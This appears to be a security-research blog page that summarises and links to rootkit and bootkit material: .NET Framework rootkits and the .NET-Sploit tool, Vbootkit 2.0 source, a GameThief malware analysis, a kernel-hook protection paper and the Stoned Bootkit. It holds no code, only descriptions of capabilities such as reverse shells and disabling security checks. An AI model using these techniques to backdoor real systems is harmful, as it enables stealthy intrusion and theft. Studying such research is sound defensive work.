he whitepaper .NET Framework rootkits - backdoors inside your framework.pdf covers various ways to develop rootkits for the .NET framework, so that every EXE/DLL that runs on a modified Framework will behave differently than what it's supposed to do. Code reviews will not detect backdoors installed inside the Framework since the payload is not in the code itself, but rather it is inside the Framework implementation. Writing Framework rootkits will enable the attacker to install a reverse shell inside the framework, to steal valuable information, to fixate encryption keys, disable security checks and to perform other nasty things as described in this paper.


This paper also introduces .NET-Sploit 1.0 - a new tool for building MSIL rootkits that will enable the user to inject preloaded/custom payload to the Framework core DLL.

Download and more info

Vbootkit 2.0



Vbootkit 2.0 is now open-source


Two security researchers open-source code that can be used to take control of versions of the Microsoft Windows 7 x64 operating system. The team decided to release the code despite initial reservations over security.

Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors presentation

Download Vbootkit 2.0 source code 

Swimming into Trojan and Rootkit GameThief.Win32.Magania Hostile Code



rojan-GameThief.Win32.Magania, according to Kaspersky naming convention, monitors the user activities trying to obtain valuable information from the affected user, especially about gaming login accounts. This long tutorial analyze this malware but is also a general document which explains how to analyze a modern nested-dolls malware. 


In this paper we will analyse more deeply the structure of this malware, especially the polymorphic part that represents a typical sample of hostile code. Starting from the first load into IDA we can see that Megania's PE structure and Import Table destroyed, this is how looks from WinGraph:


Download PDF

2009 Protecting OSs from RootKits

Countering Kernel Rootkits with Lightweight Hook Protection

Kernel rootkits have posed serious security threats due to their stealthy manner. To hide their presence and activities, many rootkits hijack control flows by modifying control data or hooks in the kernel space. A critical step towards eliminating rootkits is to protect such hooks from being hijacked. However, it remains a challenge because there exist a large number of widely-scattered kernel hooks and many of them could be dynamically allocated from kernel heap and co-located together with other kernel data. In addition, there is a lack of flexible commodity hardware support, leading to the socalled protection granularity gap kernel hook protection requires byte-level granularity but commodity hardware only provides pagelevel protection.

Source: Schneier on Security

Download PDF

Stoned Bootkit


 The Stoned Bootkit is a rootkit that is booted before the main operating system has, and is able to stay and hide itself in memory during execution of the guest operating system. The payload is executed beside the running operating system and comes with the bootkit. Stoned is designed to be operating system independent, it is multiplatform. It currently supports all 32-bit and 64-bit Windows systems and Linux.

It allows a very wide abstraction of the program and the running base, this means it is a new deployment platform of software. The current proof of concept payloads are a local privilege escalation and a remote surveillance tool. The platform, however is open for third-party future development.

The bootkit itself has an integrated module and plugin structure which allows extending its core features without touching the core code. New in this version is that it is totally independent from media, it can be started from hard disk (master boot record), but also CD/DVD/BD or even over the network.

Download PDF